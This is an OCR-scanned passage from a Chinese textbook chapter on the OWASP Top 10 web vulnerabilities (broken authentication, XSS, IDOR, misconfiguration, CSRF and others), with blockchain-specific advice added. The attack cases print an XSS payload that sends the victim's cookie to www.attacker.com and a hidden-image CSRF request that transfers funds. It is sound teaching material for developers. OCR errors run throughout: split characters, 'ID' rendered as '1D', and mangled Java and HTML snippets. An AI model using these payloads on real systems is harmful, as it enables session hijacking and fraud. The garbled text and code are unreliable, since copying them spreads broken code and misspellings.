这 样 查询 语句 的 意义 就 变 成 了 从 accounts 表 中 返回 所 有 的 记录 。 更 危险 的 攻击 可 能 导致 数据 被 自 改 ， 甚 至 存储 过 程 被 调用 。 


3.1.2 ”失效 的 身份 认证 与 会 话 管理 

与 身份 认证 和 会 话 管 理 相 关 的 应 用 功能 经 常 实现 得 不 正确 ， 人 允许 攻击 者 可 以 构造 密码 、 密 钥 或 者 会 话 令 牌 或 者 利用 Web 系 统 的 实现 缺陷 ， 假 冒 其 他 用 户 的 身份 。 
1. 存 人 在 会 话 劫持 漏洞 吗 

以 下 情况 可 能 产生 漏洞 。 

1) 用 户 身份 验证 凭证 没有 使 用 哈 希 或 加 密 保护 ( 详 见 “3.1.6 敏感 数据 泄漏 ”部 分 ) 。 

2) 认证 凭证 可 猜测 ， 或 者 能 够 通过 落 弱 的 账户 管理 功能 (如 账户 创建 、 密 码 修改 、 密 码 恢复 ， 以 及 弱 会 话 ID 等 ) 重 写 。 


3) 会 话 1D 暴 露 在 URL 里 (如 URL 重 写 ) 。 


— 


4) 会 话 |D 容 易 受 到 会 话 固 定 (Session Fixation) 的 攻击 。 


5) 会 话 1D 没 有 超时 限制 ， 或 者 用 户 会 话 或 身份 验证 令 牌 特别 是 单 点 登录 令 牌 在 用 户 注销 时 没有 和 失效。 


of 


6) 成 功 注册 后 ， 会 话 1D 没 有 轮转 。 


— 


7) 密码 、 会 话 ID 和 其 他 认证 凭据 使 用 未 加 密 连接 传输 ( 详 见 “3.1.6 敏感 数据 泄漏 ”部 分 ) 。 


— 


2. 如 何 防止 


我 们 的 建议 是 让 开发 人 员 使 用 如 下 资源 。 
1) 一 套 单一 的 、 强 大 的 认证 和 会 话 管理 系统 。 这 套 控制 系统 应 该 做 到 : 
` 满足 DWASP 的 应 用 程序 安全 验证 标准 (ASVS) 中 V2 (认证 ) 和 V3 (会 话 管 理 ) 中 制定 的 所 有 认证 和 会 话 管理 的 要 求 。 
具有 简单 的 开发 界面 ESAPI 认 证 器 和 用 户 API 是 可 以 仿照 、 使 用 或 扩展 的 好 范例 。 
2) 企业 同样 也 要 做 出 巨大 努力 来 避免 跨 站 漏洞 ， 因 为 这 一 漏洞 可 以 用 来 盗窃 用 户 会 话 ID ( 详 见 3.1.3 节 ) 。 
3) 有 关 区 块 链 的 身份 管理 ， 其 他 章节 将 详细 介绍 。 
3. 攻 击 案例 


案例 #1: 机 票 预订 应 用 程序 支持 URL 重 写 ， 把 会 话 ID 放 在 URL 里 。 


http:// example.com/sale/saleitems;jsessionigd= 
2POOC2JSNDLPSKHCJUN2JV?dest=Hawaii 





该 网 站 一 个 经 过 认证 的 用 户 希 望 让 他 的 朋友 们 知道 这 一 机 票 打折 信息 ， 于 是 将 上 面 的 链接 通过 邮件 发 给 了 朋友 们 ， 却 不 知道 已 经 泄漏 了 自己 的 会 话 ![D。 当 他 的 朋友 们 使 用 上 面 的 链接 时 ， 他 们 将 会 使 
用 他 的 会 话 和 信用 卡 。 


案例 #2: 应 用 程序 超时 设置 不 当 。 用 户 使 用 公共 计算 机 访问 网 站 ， 离 开 时 没有 单 击 “ 退 出 ”按钮 ， 而 是 直接 关闭 浏览 器 。 攻 击 者 在 一 个 小 时 后 能 使 用 相同 浏览 器 通过 身份 认证 。 


案例 #3: 内 部 或 外 部 攻击 者 进入 系统 的 密码 数据 库 。 由 于 存储 在 数据 库 中 的 用 户 密码 没有 被 加 密 ， 所 有 用 户 的 密码 都 被 攻击 者 获得 。 


3.1.3 ” 跨 站 脚本 漏洞 


当 应 用 服务 接收 不 被 信任 的 数据 ， 并 且 将 该 数据 不 经 过 验证 或 者 字符 过 滤 ， 就 发 送 给 客户 的 Web 浏 览 器 ， 就 有 可 能 遭 到 跨 站 脚本 (Cross Site Scripting，XSS) 攻击 。XSS 攻 击 允 许 攻击 者 在 受害 者 
的 浏览 器 中 执行 脚本 ， 用 于 动 持 受害 者 用 户 的 会 话 信息 ， 伤 害 特 定 的 网 站 ， 或 者 重 定向 用 户 到 恶意 站 点 。 


1. 存 在 XSS 漏 洞 吗 


如 果 服 务 器 端 代码 使 用 用 户 提 供 的 输入 作为 HTML 输 出 的 一 部 分 ， 并 且 不 使 用 上 下 文 相关 的 转 义 来 确保 它 无 法 运行 ， 则 很 容易 受到 服务 器 XSS 的 影响 。 如 果 网 页 使 用 JavaScript 来 动态 地 将 攻击 者 可 控 
数据 添加 到 页 面 ， 那 么 可 能 需要 注意 Client XSS$。 理 想 情 况 下 ， 我 们 将 避免 将 攻击 者 可 控 数 据 发 送 到 不 安全 的 JavaScript AP1， 但 是 可 以 使 用 输入 验证 来 转 义 (并 在 较 小 程度 上 ) 进行 输入 验证 。 当 然 自动 
化 工具 能 够 自动 找到 一 些 跨 站 脚本 漏洞 ， 然 而 每 一 个 应 用 程序 使 用 不 同 的 方式 生成 输出 页 面 ， 并 且 使 用 不 同 的 浏览 器 端 解 释 器 ， 如 JavaScript、ActiveX、Flash 和 Silverlight， 这 使 得 自动 检测 变 得 很 困 
难 。 类 似 AJAX 的 Web 2.0 技 术 使 得 跨 站 脚本 漏洞 更 难 通过 自动 工具 检测 到 。 因 此 ， 要 想 达 到 全 面 覆 盖 ， 必 须 使 用 一 种 综合 的 方式 一 在 自动 检测 的 基础 上 ， 同 时 采用 人 工 代码 审核 和 手动 渗透 测试 。 


2. 如 何 防止 XSS 攻 击 
防止 XSS 攻 击 需 要 将 不 可 信 数 据 与 动态 的 浏览 器 内 容 区 分 开 。 


1) 为 了 避免 出 现 Server XSS 漏 洞 ， 最 好 的 办 法 是 根据 数据 将 要 置 于 的 HTML 上 下 文 (包括 主体 、 属 性 、JavaScript、CSS 或 URL) 对 所 有 的 不 可 信 数 据 进行 恰当 的 转 义 。 更 多 关于 数据 转 义 技术 的 信息 
参见 开放 式 Web 应 用 程序 安全 项 目的 DOM XSS 攻 击 应 对 手册 (OWASP DOM XSS Prevention Cheat 
Sheet, https://www.owasp.org/index.php/XSS (Cross Site Scripting) Prevention Cheat Sheet) 。 


2) 为 了 避免 出 现 Client XSs 漏 洞 ， 首 选 方案 是 避免 将 不 受信 任 的 数据 传递 给 可 生成 活动 内 容 的 JavaSscript 和 其 他 浏览 器 API。 当 无 法 避免 这 种 情况 时 ， 开 放 式 Web 应 用 程序 安全 项 目的 DOM XSS 攻 击 
应 对 手册 ， 把 不 受信 任 的 数据 通过 数据 转 义 以 后 再 传 给 浏览 器 APl。 


3) 更 多 内 容 参见 OWASP 的 AntiSamy 或 者 Java HTML Sanitizer 项 目 。 

4) 考虑 使 用 内 容 安全 策略 (CSP) 来 抵御 整个 网 站 的 跨 站 脚本 攻击 。 

5) 除了 做 好 以 上 的 工作 以 外 ， 区 块 链 的 Web 端 需要 防止 由 于 不 可 信 数 据 引起 的 不 适当 智能 合约 的 调用 。 
3. 攻 击 案例 


应 用 程序 在 下 面 HTML 代 码 段 的 构造 中 使 用 了 未 经 验证 或 转 义 的 不 可 信 的 数据 : 





String) page += "<input name='creqitcardq' type="'TEXT‘ value='" + request.getParameter 
( mCCT 十 1 Ls 


攻击 者 在 浏览 器 中 修改 "CC" 参 数 为 如 下 值 : 








'><script>document.location='http:// www.attacker.com/cgi-bin/cookie.cgi?foo="'+document. 
Cookie</script>'. 





这 导致 受害 者 的 会 话 1D 被 发 送 到 攻击 者 的 网 站 ， 使 得 攻击 者 能 够 动 持 用 户 当前 会 话 。 注 意 ， 攻 击 者 同样 能 使 用 跨 站 脚本 攻破 应 用 程序 可 能 使 用 的 任何 跨 站 请 求 伪造 (Cross Site Request 
Forgery，CSRF) 防御 机 制 。CSRF 的 详细 情况 参见 3.1.8 节 的 介绍 。 


3.1.4 不 安全 的 直接 对 象 引 用 


应 用 开发 者 有 时 可 能 会 暴露 应 用 内 部 实现 对 象 的 引用 ， 如 文件 、 目 录 或 者 数据 库 Key 等 。 如 果 没 有 对 这 些 的 访问 控制 或 者 其 他 保护 ， 攻 击 者 就 有 可 能 利用 这 些 暴露 的 引用 访问 未 授权 的 数据 。 


1. 有 不 安全 的 直接 对 象 引用 吗 

查找 应 用 程序 是 否 存 在 容易 受到 访问 控制 的 漏洞 ， 最 佳 方法 是 验证 所 有 数据 和 函数 引用 是 否 具 有 适当 的 防御 。 要 确定 是 否 容 易 受到 攻击 ,可 考虑 以 下 几 点 。 

1) 对 于 数据 引用 ， 应 用 程序 是 否 通 过 使 用 映射 表 或 访问 控制 检查 确保 用 户 获 得 授权 ， 以 确保 用 户 对 该 数据 进行 授权 ? 

2) 对 于 非 公 共 功 能 请 求 ， 应 用 程序 是 否 确 保 用 户 进行 了 身份 验证 ， 并 具有 使 用 该 功能 所 需 的 角色 或 权限 ? 

应 用 程序 的 代码 审查 可 以 验证 这 些 控 件 是 否 正确 实施 ， 并 且 在 任何 地 方 都 需要 进行 审计 。 手 动 测试 对 于 识别 访问 控制 缺陷 也 是 有 效 的 。 自 动 化 工具 通常 不 会 找到 这 样 的 缺陷 ， 因 为 它们 无 法 识别 需要 
什么 保护 ， 什 么 是 安全 的 或 不 安全 的 。 
2. 如 何 防止 

防止 访问 控制 缺陷 ， 需 要 选择 一 种 适当 的 方法 来 保护 每 一 个 用 户 可 访问 的 对 象 (如 对 象 号 码 、 文 件 名 ) 。 

1) 检查 访问 。 任 何 来 自 不 可 信 源 的 直接 对 象 引 用 都 必须 通过 访问 控制 检测 ， 确 保 该 用 户 对 请 求 的 对 象 有 访问 权限 。 


2) 使 用 基于 用 户 或 会 话 的 间接 对 象 引 用 ， 这 样 能 防止 攻击 者 直接 攻击 未 授权 资源 。 例 如 ， 一 个 下 拉 列 表 包 含 6 个 授权 给 当前 用 户 的 资源 ， 它 可 以 使 用 数字 1 ~ 6 来 指示 哪个 是 用 户 选 择 的 值 ， 而 不 是 使 
用 资源 的 数据 库 关 键 字 来 表示 。 在 服务 器 端 ， 应 用 程序 需要 将 每 个 用 户 的 间接 引用 映射 到 实际 的 数据 库 关 键 字 。OWAsP 的 ESAPI 中 包含 了 2 种 序列 和 随机 访问 引用 映射 ， 开 发 人 员 可 以 用 来 消除 直接 对 象 
引用 。 


3) 自动 验证 。 利 用 自动 化 工具 来 验证 正确 的 授权 部 署 。 这 要 成 为 习惯 。 
4) 尽量 利用 基于 用 户 或 会 话 的 间接 对 象 引 用 区 块 链 的 智能 合约 和 账本 信息 ， 尽 量 避 免 直接 调用 。 
3. 攻 击 案例 


案例 #1: 应 用 程序 在 访问 账户 信息 的 SQL 调用 中 使 用 了 未 验证 数据 : 


pstmt.setString(1l, request.getparameter ("acct")); 
ResultSset results = pstmt .executeQuery () ， 





攻击 者 能 轻易 在 浏览 器 将 "acct" 参 数 修改 成 他 所 想 要 的 任何 账户 号 码 。 如 果 应 用 程序 没有 进行 恰当 的 验证 ， 攻 击 者 就 能 访问 任何 用 户 的 账户 ， 而 不 仅仅 是 该 目标 用 户 的 账户 。 











http:// example.com/app/accountInfo?acct=notmyacct 





案例 #2: 攻击 者 只 是 简单 地 强制 浏览 目标 URL， 如 需要 管理 员 权限 才能 访问 的 管理 页 面 。 








http:// example.com/app/getappInfo 
http:// example.com/app/admin getappInfo 
































如 果 未 经 身份 验证 的 用 户 可 以 访问 任何 一 个 页 面 ， 这 是 一 个 缺陷 。 如 果 非 管理 员 可 以 访问 管理 页 面 ， 这 也 是 一 个 缺陷 。 


3.1.5 “安全 配置 错误 

应 用 、 框 架 、Web 服 务 器 、 数 据 库 服 务 器 、 区 块 链 的 节点 和 各 种 应 用 平台 的 良好 的 安全 性 需要 一 份 定义 好 的 、 部 署 好 的 安全 配置 。 安 全 配置 必须 进行 良好 的 定义 、 实 现 、 维 护 ， 默 认 配 置 通常 情况 下 
是 不 安全 的 。 另 外 ， 软 件 应 该 及 时 更 新 。 
1. 容 易 受 到 攻击 吗 

应 用 程序 是 否 对 整个 程序 堆栈 实施 了 恰当 的 安全 加 固 ? 

1) 是 否 有 软件 没有 被 及 时 更 新 ”这 包括 操作 系统 、Web/ 应 用 服务 器 、 区 块 链 的 各 个 节点 、 数 据 库 管 理 系统 、 应 用 程序 和 其 他 所 有 的 代码 库 文 件 。 

2) 是 否 使 用 或 安装 了 不 必要 的 功能 (如 端口 、 服 务 、 网 页 、 账 户 、 权 限 ) ? 


3) 默认 账户 的 密码 是 否 仍 然 可 用 或 没有 更 改 ? 


— 


4) 错误 处 理 设置 是 否 可 防止 堆栈 跟踪 和 含有 大 量 其 他 信息 的 错误 消息 被 泄漏 ? 
5) 开发 框架 (如 Struts、Spring、ASP.NET、REMIX、Ethereum) 和 库 文 件 中 的 安全 设置 是 否 理解 正确 并 配置 恰当 ? 


缺少 一 个 协定 的 、 可 重复 的 应 用 程序 安全 配置 的 过 程 ， 系 统 将 处 于 高 风险 中 。 
2. 如 何 防止 


主要 的 建议 包括 以 下 几 个 方面 。 
1) 一 个 可 以 快速 目 易于 部 署 在 男 一 个 锁定 环境 的 可 重复 的 加 固 过 程 。 开 发 、 质 量 保证 和 生产 环境 都 应 该 配置 相同 (每 个 环境 中 使 用 不 同 的 密码 ) 。 这 个 过 程 应 该 是 自动 化 的 ， 以 尽量 减少 安装 一 个 新 
安全 环境 的 耗费 。 


2) 一 个 能 及 时 了 解 并 部 署 每 个 已 部 署 环境 的 所 有 最 新 软件 更 新 和 补丁 的 过 程 。 这 需要 包括 通常 被 忽略 的 所 有 代码 的 库 文件 〈 详 见 3.1.9 节 ) 。 
3) 一 个 能 在 组 件 之 间 提 供 有 效 的 分 离 和 安全 性 的 强大 应 用 程序 架构 。 


4) 一 个 自动 化 过 程 来 验证 在 所 有 环境 中 配置 和 设置 是 否 正确 。 


3. 攻 击 案例 
案例 #1: 应 用 程序 服务 器 管理 员 控 制 台 自动 安装 后 没有 被 删除 ， 而 默认 账户 也 没有 被 改变 。 攻 击 者 在 服务 器 上 发 现 了 标准 的 管理 员 页 面 ， 通 过 默认 密码 登录 ， 从 而 接管 了 服务 器 。 


案例 #2: 目录 列表 在 服务 器 上 未 被 禁用 。 攻 击 者 友 现 只 需 列 出 目录 ， 就 可 以 找到 服务 器 上 的 任意 文件 。 攻 击 者 找到 并 下 载 所 有 已 编译 的 Java 类 ， 通 过 反 编 译 获得 了 所 有 自 定义 代码 ， 然 后 在 应 用 程序 
中 找到 一 个 访问 控制 的 严重 漏洞 。 


案例 #3: 应 用 程序 服务 器 配置 允许 堆栈 跟 踩 返回 给 用 户 ， 这 样 就 暴露 了 潜在 的 漏洞 ， 例 如 已 知 易 受 攻击 框架 版 本 。 


案例 #4: 应 用 程序 服务 器 自 带 的 示例 应 用 程序 没有 从 生产 服务 器 中 删除 。 该 示例 应 用 有 已 知 安全 漏洞 ， 攻 击 者 可 以 利用 这 些 漏洞 破坏 服务 器 。 


3.1.6 “敏感 数据 泄漏 


许多 Web 应 用 没有 正确 地 保护 敏感 数据 ， 例 如 信用 卡 卡 号 、 税 号 、 身 份 认 证 证 书 等 。 攻 击 者 可 以 通过 偷 穷 、 更 改 这 种 弱 保 护 的 数据 ， 以 进行 信用 卡 诈骗 、 身 份 窃取 或 者 其 他 犯罪 。 这 类 敏感 数据 值得 
进行 额外 的 保护 ， 例 如 加 密 传输 、 在 客户 端 浏 览 器 交换 数据 时 进行 特殊 的 保护 。 


1. 容 易 受 到 攻击 吗 
首先 需要 确认 的 是 哪些 数据 是 敏感 数据 ， 需 要 被 加 密 。 例 如 密码 、 信 用 卡 、 医 疗 记 录 、 个 人 信息 等 都 是 敏感 数据 ， 应 该 被 加 密 。 
对 于 这 些 数据 ， 要 确保 以 下 几 个 方面 。 
1) 当 这 些 数据 被 长 期 存储 的 时 候 ， 无 论 存 储 在 哪里 ， 它 们 是 否 都 被 加 密 ， 特 别 是 对 这 些 数据 的 备份 ? 
2) 无 论 内 部 数据 还 是 外 部 数据 ， 传 输 时 是 否 是 明文 传输 ? 在 互联 网 中 传输 明文 数据 是 非常 危险 的 。 
3) 是 否 还 在 使 用 任何 旧 的 或 脆弱 的 加 密 算法 ? 
4) 加 密 密 钥 的 生成 是 否 是 脆弱 的 ， 或 者 缺少 恰当 的 密 钥 管理 或 缺少 密 钥 回 转 ? 
2. 如 何 防止 
有 关 使 用 不 安全 的 加 密 算法 、SSL (Secure Sockets Layer， 安 全 套 接 层 ) 应 用 和 数据 保护 的 风险 超出 了 Top 10 的 范围 。 尽 管 如 此 ， 对 一 些 需 要 加 密 的 敏感 数据 ， 应 该 起 码 做 到 以 下 几 点 。 
1) 预测 一 些 威胁 (比如 内 部 攻击 和 外 部 用 户 ) ， 加 密 这 些 数 据 的 存储 以 确保 免 受 威胁 。 
2) 对 于 没 必 要 存放 的 、 重 要 的 敏感 数据 ， 应 当 尽快 清除 。 
3) 确保 使 用 了 合适 的 、 强 大 的 标准 算法 和 强大 的 密 匙 ， 并 且 密 是 管理 到 位 。 可 参考 FIPS 140 validated cryptographic modules。 
4) 确保 使 用 国 密 专用 算法 存储 密码 。 
5) 禁用 自动 完成 功能 以 防止 敏感 数据 收集 ， 禁 用 包含 敏感 数据 的 缓存 页 面 。 


6) 在 公有 链 上 人 避免 存储 敏感 数据 。 可 以 把 敏感 数据 存储 到 链 下 ， 也 可 以 采用 联盟 或 者 私有 链 方法 利用 身份 管理 和 访问 控制 来 设 定 对 敏感 数据 的 访问 权限 。 
3. 攻 击 案例 


案例 #1: 一 个 应 用 程序 对 存储 在 数据 库 中 的 信用 卡 信息 做 了 加 密 ， 以 防止 这 些 信息 暴露 给 最 终 用 户 ， 但 是 数据 库 被 设置 为 对 信用 卡 表 列 的 查询 进行 自动 解密 ， 这 就 使 得 SQL 注 入 漏洞 能 够 获得 所 有 信 
卡 信息 的 明文 。 备 选 处 理 方案 包括 不 存储 信用 卡号 码 、 使 用 标记 化 或 使 用 公 钥 加 密 。 


案例 #2: 一 个 网 站 上 所 有 需要 身份 验证 的 网 页 都 没有 使 用 SSL， 攻 击 者 只 需 监控 网 络 数 据 流 (比如 一 个 开放 的 无 线 网 络 或 其 所 在 社区 的 有 线 网 络 ) ， 并 窃取 一 个 已 验证 的 受害 者 的 会 话 Cookie， 然 后 
利用 这 个 Cookie 执 行 重 放 攻 击 并 接管 用 户 的 会 话 ， 即 可 访问 用 户 的 隐私 数据 。 


案例 #3: 密码 数据 库 使 用 unsalted 的 哈 希 算法 存储 每 个 人 的 密码 ， 一 个 文件 上 传 漏洞 就 会 给 黑客 留 下 可 乘 之 机 一 一 所 有 这 些 unsalted 哈 希 的 密码 只 需 通 过 彩虹 表 暴 力 破 解 方式 即 可 破解 。 


3.1.7 ”功能 级 访问 控制 缺失 
大 部 分 Web 应 用 在 界面 上 进行 了 应 用 级 访问 控制 ， 但 是 应 用 服务 器 端 也 要 进行 相应 的 访问 控制 才 行 。 如 果 请 求 没有 验证 ， 攻 击 者 就 能 够 构造 请 求 访问 未 授权 的 功能 。 
1. 容 易 受 到 攻击 吧 


尝试 手动 攻击 或 针对 应 用 程序 运行 诸如 IBM APPScan 这 样 的 扫描 器 进行 漏洞 扫描 。 应 用 程序 或 API 应 该 识别 攻击 ， 阻 止 任何 可 行 的 攻击 ， 并 识别 、 收 集 攻 击 者 的 细节 和 攻击 的 特征 。 如 果 在 发 现 关键 
漏洞 时 无 法 快速 推出 补丁 ， 则 会 受到 攻击 。 一 定 要 了 解 针对 攻击 的 防范 措施 所 能 履 盖 的 攻击 类 型 ， 不 应 该 只 是 X99 和 SQL 注入 。 我 们 可 以 通过 WAF、RASP 和 OWAsSP AppSensor 等 技术 来 检测 并 阻止 攻 
击 。 


2. 如 何 防止 
可 以 利用 下 面 的 方法 进行 保护 。 


1) 检测 攻击 。 有 没有 发 生 合法 用 户 不 可 能 产生 (例如 ， 正 常用 户 使 用 客户 端 无 法 生成 的 输入 ) 的 情况 ”应 用 程序 是 否 以 普通 用 户 永 远 不 会 做 的 方式 运行 例如， 请求 频率 太 高 、 非 典型 输入 、 有 异常 使 
用 模式 、 重 复 请 求 ) ? 


2) 对 攻击 的 响应 。 日 志和 通知 对 及 时 响应 至 关 重 要 。 可 以 考虑 是 否 自动 阻止 请 求 ， 并 确定 阻止 的 I|P 地 址 或 1P 段 ; 考虑 禁用 或 监控 不 良 行为 的 用 户 账户 。 

3) 快速 修复 。 如 果 开 发 或 运 维 团队 无 法 在 一 天 内 推出 天 键 修补 程序 ， 应 部 署 一 个 可 以 分 析 HTTP 流 量 、 数 据 流 和 /或 代码 执行 的 虚拟 补丁 ， 并 防止 漏洞 被 利用 。 

4) 可 以 用 特殊 的 智能 合约 来 判断 不 正常 的 用 户 行为 ， 并 且 在 发 现 紧急 安全 问题 时 ， 容 许 智 能 合约 的 拥有 者 停止 智能 合约 的 运行 ， 或 者 容许 智能 合约 自动 采取 措施 停止 运行 。 
3. 攻 击 案例 

案例 #1: 攻击 者 使 用 自动 化 工具 (如 OWASP ZAP 或 SQLMap) 来 检测 漏洞 并 可 能 利用 它们 。 

攻击 检测 应 该 以 识别 应 用 程序 的 异常 请 求 和 巨大 流量 为 目标 。 自 动 扫描 应 易于 与 正常 流量 区 分 开 来 。 


案例 #2: 熟练 的 攻击 者 仔细 挖掘 潜在 的 漏洞 ， 最 终 确 认 了 一 个 难以 太 现 的 缺陷 。 虽 然 难以 检测 ， 但 这 种 攻击 仍然 包含 正常 用 户 永远 不 会 发 送 的 请 求 ， 例 如 UlI 不 允许 的 输入 。 跟 踩 这 个 攻击 者 可 能 需 
建立 一 个 时 间 表 现 恶意 的 案例 。 


案例 #3: 攻击 者 开始 利用 应 用 程序 中 的 一 个 漏洞 ， 但 当前 的 保护 措施 无 法 阻止 。 此 时 可 以 快速 部 署 一 个 真正 的 或 虚拟 的 补丁 来 阻止 对 此 漏洞 的 持续 利用 。 


3.1.8 ” 跨 站 请 求 伪造 

跨 站 请 求 伪造 (以 下 简称 CSRF) 攻击 会 强制 一 个 已 经 登入 的 受害 者 浏览 器 ， 向 带 漏洞 的 Web 应 用 发 送 伪造 的 HTTP 请 求 ， 但 是 使 用 的 是 受害 者 正确 的 会 话 Cookie， 以 及 其 他 的 认证 信息 ， 这 样 攻击 者 
就 可 以 让 Web 应 用 认为 这 是 受害 者 自愿 发 送 的 请 求 。 
1. 存 在 CSRF 漏 洞 吗 


爹 测 应 用 程序 是 否 人 存在 该 漏洞 的 方法 是 查看 是 否 每 个 链接 和 表单 都 提供 了 不 可 预测 的 CSRF 令 牌 。 没 有 这 样 的 令 牌 ， 攻 击 者 就 能 够 伪造 恶意 请 求 。 另 一 种 防御 的 方法 是 要 求 用 户 证 明 他 们 要 提 和 交 请 求 ， 
比如 通过 重新 认证 的 方式 。 重 点 天 注 那些 调用 能 够 改变 状态 功能 的 链接 和 表格 ， 因 为 它们 是 跨 站 请 求 伪造 攻击 的 最 重要 的 目标 。 由 于 多 步 交 易 并 不 具备 内 在 的 防 攻击 能 力 ， 因 此 我 们 需要 检测 这 些 交 易 。 
还 要 注意 ， 服 务 器 端 请 求 伪 造 (SSRF) 也 可 以 通过 欺骗 应 用 和 APl 来 生成 任意 HTTP 请 求 。 


注意 会 话 Cookic、 源 IP 地 址 和 其 他 浏览 器 自动 发 送 的 信息 不 能 作为 防 攻击 令 牌 ， 因 为 这 些 信 息 已 经 包含 在 伪造 的 请 求 中 。OWASP 的 CSRE 测 试 工具 有 助 于 生成 测试 案例 ， 可 用 于 展示 跨 站 请 求 伪造 
漏洞 的 危害 。 
2. 如 何 防止 CSRF 


首选 方案 是 使 用 现 有 的 CSRF 防 御 措 施 。 如 今 许多 框架 内 置 CSRF 防 御 功 能 ， 如 Spring、Play、Django 和 AngularJS$。 一 些 Web 开 发 语言 ， 如 .NET 也 是 如 此 。OWASP 的 CSRF Guard 可 以 自动 将 CSRF 
防御 添加 到 Java 应 用 程序 。OWASP 的 CSRF Protector 对 于 PHP 或 Apache 有 着 相同 的 过 滤 作 用 。 否 则 ， 阻 止 CSRF 通 常 需要 在 每 个 HTTP 请 求 中 包含 不 可 预测 的 令 牌 ， 并 且 这 种 令 牌 在 每 个 用 户 会 话 中 都 是 
唯一 的 。 


1) 最 好 的 方法 是 将 独 有 的 令 牌 包含 在 一 个 隐藏 字段 中 ， 使 该 令 牌 通过 HTTP 请 求 体 友 送 ， 避 免 其 包含 在 URL 中 从 而 被 暴露 出 来 。 
2) 该 独 有 令 牌 同样 可 以 包含 在 URL 中 或 作为 一 个 URL 人 参数， 但 是 这 种 方法 的 巨大 风险 在 于 URL 会 暴露 给 攻击 者 ， 这 样 秘 密令 牌 也 会 被 泄漏 。 
3) 考虑 在 所 有 Cookie 中 使 用 "SameSite=strict" 标 志 ， 这 在 浏览 器 中 越 来 越 受到 支持 。 

3. 攻 击 案例 


应 用 程序 允许 用 户 提 交 不 包含 任何 保密 字段 的 状态 改变 请 求 ， 如 : 





http:// example.com/app/transferFunds?amount=1500 
&destinationAccount=4673243243 


因此 ， 攻 击 者 构建 一 个 请 求 ， 用 于 将 受害 用 户 账户 中 的 现金 转移 到 自己 的 账户 。 然 后 攻击 者 在 其 控制 的 多 个 网 站 的 图 片 请 求 或 iframe 中 嵌入 这 种 攻击 。 





<img src="http:// example.com/app/transferFunds? 
amount=1500&destinationAccount=attackersAcct#" 
wiqdth="0" height="0" /> 





如 果 受 害 用 户 通过 example.com 认 证 后 访问 任何 一 个 攻击 者 的 网 站 ， 伪 造 的 请 求 将 自动 包含 用 户 的 会 话 信息 ， 授 权 执 行 攻击 者 的 请 求 。 


3.1.9 ”使 用 已 知 易 受 攻击 组 件 


组 件 ， 比 如 库 、 框 架 或 者 其 他 的 软件 模块 ， 通 常 运行 在 最 高 权限 。 如 果 一 个 有 弱点 的 组 件 被 恶意 利用 ， 束 可 能 被 攻击 者 控制 服务 器 或 者 造成 严重 的 数据 损失 。 使 用 已 知 易 受 攻击 组 件 的 应 用 会 导致 应 
用 整体 安全 性 的 降低 ， 并 且 造 成 一 定 范围 的 攻击 和 影响 。 


1. 是 否 存 在 含有 已 知 易 受 攻击 组 件 的 漏洞 


理论 上 ， 应 该 很 容易 确定 当前 是 否 在 使 用 含有 漏洞 的 组 件 或 者 库 。 不 乎 的 是 ， 商 业 或 开源 软件 的 漏洞 报告 并 不 能 以 标准 的 、 可 碍 找 的 方式 指定 受 影响 组 件 的 确切 版 本 信息 。 更 有 甚 者 ， 并 不 是 所 有 的 
库 都 使 用 易于 理解 的 版 本 编号 系统 。 最 糟糕 的 是 ， 不 是 所 有 的 漏洞 都 报告 给 一 个 方便 查询 的 漏洞 中 心 ， 尽 管 像 CVE 或 NVD 这 样 的 网 站 正 变 得 更 易于 搜索 。 判 断 是 否 易 于 受到 这 类 攻击 ， 需 要 不 停 地 搜索 这 
些 数据 库 ， 还 要 关注 大 量 的 邮件 列表 和 可 能 包含 漏洞 发 布 的 公告 信息 。 如 果 使 用 的 组 件 之 一 存在 漏洞 ， 则 应 该 仔细 评估 该 漏洞 是 否 给 业务 也 珊 来 了 缺陷 。 此 评估 可 以 通过 检查 代码 使 用 该 组 件 的 部 分 ， 以 


及 该 缺陷 可 能 导致 的 结果 来 完成 。 


2. 如 何 防止 


大 多 数组 件 项 目 并 不 会 为 其 老 版 本 提供 漏洞 补丁 ， 只 是 在 下 个 版 本 中 修正 此 问题 ， 所 以 升级 到 新 版 本 是 很 重要 的 。 软 件 项 目 应 该 有 如 下 的 流程 。 
1) 持续 地 清点 、 整 理 客户 端 和 服务 器 端 所 使 用 的 组 件 和 与 组 件 存在 依赖 关系 的 组 件 的 版 本 等 信息 。 

2) 连续 监控 如 NVD 等 披露 的 组 件 中 的 漏洞 是 否 出 现在 自己 的 应 用 中 。 可 以 使 用 软件 结合 分 析 工 具 自 动 化 进行 这 个 过 程 。 

3) 分 析 库 文件 以 确保 在 进行 更 改 之 前 在 运行 时 实际 调用 了 它 ， 因 为 绝 大 多 数组 件 都 不 会 被 加 载 或 调用 。 

4) 决定 是 升级 组 件 (如 果 需 要 ， 重 写 应 用 程序 以 匹配 ) 还 是 部 署 一 个 分 析 HTTP 流 量 、 数 据 流 或 代码 执行 的 虚拟 补丁 ， 并 防止 漏洞 被 利用 。 

5) 基于 开源 的 区 块 链 项 目 需要 关注 组 件 的 安全 性 ， 必 须 建立 一 个 机 制 淘汰 或 者 升级 不 安全 的 组 件 。 


3. 攻 击 案例 


组 件 几 乎 总 是 以 应 用 程序 的 全 部 特权 运行 ， 因 此 任何 组 件 的 缺陷 都 可 能 导致 严重 的 影响 。 这 种 缺陷 可 能 是 偶然 的 〈 例 如 ， 编 码 错误 ) 或 有 意 的 (例如 组 件 中 的 后 门 ) 。 


一 些 攻击 使 用 含有 已 知 漏洞 的 组 件 的 例子 如 下 。 


. Apache CXF 认 证 绕 过 





未 能 提供 身份 令 牌 的 情况 下 ， 攻 击 者 可 以 以 最 高 权限 调用 任意 的 Web 服 务 。Apache CXF 是 一 个 服务 框架 ， 不 要 与 Apache 应 用 服务 器 混淆 。 





. Spring 远程 代码 执行 一 一 滥用 Spring 中 语言 表达 式 的 实现 允许 攻击 者 执行 任意 代码 ， 从 而 有 效 接 管 服务 器 。 


每 个 使 用 上 述 两 个 任意 一 个 库 的 应 用 程序 ， 都 是 易于 受到 攻击 的 。 因 为 两 个 组 件 都 会 被 应 用 用 户 直 接 访问 。 其 他 的 漏洞 库 ， 在 应 用 程序 中 使 用 得 越 深入 ， 可 能 越 难 被 利用 。 


3.1.10 ”未 验证 的 重 定向 和 转发 


Web 应 用 经 常会 将 用 户 重 定向 到 其 他 的 页 面 或 站 点 ， 并 且 使 用 不 可 信 的 数据 来 确定 目标 页 面 。 如 果 不 进行 正确 的 验证 ， 攻 击 可 以 让 受害 者 重 定向 到 “钓鱼 ”或 者 “ 挂 马 ” 的 网 站 ,或 者 利用 重 定向 访 
问 未 授权 页 面 。 


